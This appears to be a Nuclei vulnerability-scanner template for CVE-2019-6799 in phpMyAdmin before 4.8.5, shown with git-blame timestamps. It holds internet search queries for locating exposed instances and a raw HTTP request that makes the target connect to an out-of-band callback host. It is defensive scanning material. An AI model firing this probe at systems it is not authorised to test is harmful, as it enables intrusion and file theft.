2023-03-14 13:28:18 +00:00
id : CVE-2019-6799
info :
2023-04-03 20:11:35 +00:00
name : phpMyAdmin <4.8.5 - Local File Inclusion
2023-03-14 13:28:18 +00:00
author : pwnhxl
2023-03-17 17:31:47 +00:00
severity : medium
2023-03-16 20:41:29 +00:00
description : |
2023-04-03 20:11:35 +00:00
phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
2023-09-06 12:53:28 +00:00
remediation : |
Upgrade phpMyAdmin to version 4.8.5 or later to mitigate this vulnerability.
2023-03-14 13:28:18 +00:00
reference :
- https://paper.seebug.org/1112/#_4
- https://github.com/phpmyadmin/phpmyadmin/commit/828f740158e7bf14aa4a7473c5968d06364e03a2
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6799
- https://github.com/rmb122/rogue_mysql_server
- https://github.com/vulnspy/phpmyadmin-4.8.4-allowarbitraryserver
2023-04-03 20:11:35 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-6799
2023-03-17 17:31:47 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 5.9
cve-id : CVE-2019-6799
2024-03-23 09:28:19 +00:00
epss-score : 0.1829
2024-04-08 11:34:33 +00:00
epss-percentile : 0.96069
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
2023-03-14 13:28:18 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:53:28 +00:00
max-request : 6
2023-07-11 19:49:27 +00:00
vendor : phpmyadmin
product : phpmyadmin
2024-06-07 10:04:29 +00:00
shodan-query :
- title:"phpmyadmin"
- http.title:"phpmyadmin"
- http.component:"phpmyadmin"
- cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin"
fofa-query :
- body="pma_servername" && body="4.8.4"
- title="phpmyadmin"
2024-05-31 19:23:20 +00:00
google-query : intitle:"phpmyadmin"
2024-06-07 10:04:29 +00:00
hunter-query :
- app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4"
- app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4"
2024-01-14 09:21:50 +00:00
tags : cve,cve2019,phpmyadmin,mysql,lfr,intrusive,sqli
2023-03-14 13:28:18 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-14 13:28:18 +00:00
- raw :
2023-03-14 13:42:32 +00:00
- |
2023-03-14 13:28:18 +00:00
GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1
Host : {{Hostname}}
payloads :
path :
2023-07-11 19:49:27 +00:00
- /index.php
- /pma/index.php
- /pmd/index.php
- /phpMyAdmin/index.php
- /phpmyadmin/index.php
- /_phpmyadmin/index.php
2023-03-14 13:28:18 +00:00
2023-07-11 19:49:27 +00:00
attack : batteringram
2023-03-14 13:28:18 +00:00
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2023-03-14 13:28:18 +00:00
matchers-condition : and
matchers :
- type : dsl
dsl :
- compare_versions(version, '< 4.8.5')
- type : dsl
dsl :
- compare_versions(version, '> 3.9.9')
- type : dsl
dsl :
- compare_versions(phpversion, '< 7.3.4')
2023-07-11 19:49:27 +00:00
- type : word
part : interactsh_protocol
words :
- dns
- type : word
words :
- mysqli_real_connect
- type : word
words :
- pma_servername
2023-03-14 13:28:18 +00:00
- type : status
status :
2023-03-14 13:32:46 +00:00
- 200
2023-07-11 19:49:27 +00:00
extractors :
- type : regex
name : version
group : 1
regex :
- \?v=([0-9.]+)
internal : true
- type : regex
group : 1
regex :
- \?v=([0-9.]+)
- type : regex
name : phpversion
group : 1
regex :
- "X-Powered-By: PHP/([0-9.]+)"
internal : true
part : header
2024-06-08 16:02:17 +00:00
# digest: 480a00453043021f046cd821d36c9b1e7631057610cc491d58a1aa89538b67f077b98b22a9c63102201ea24971ec29e4b1165bd9eb6aa58a66f4f4f7c8e0b6c5f9460b93438b9dcd51:922c64590222798bb761d5b6d8e72950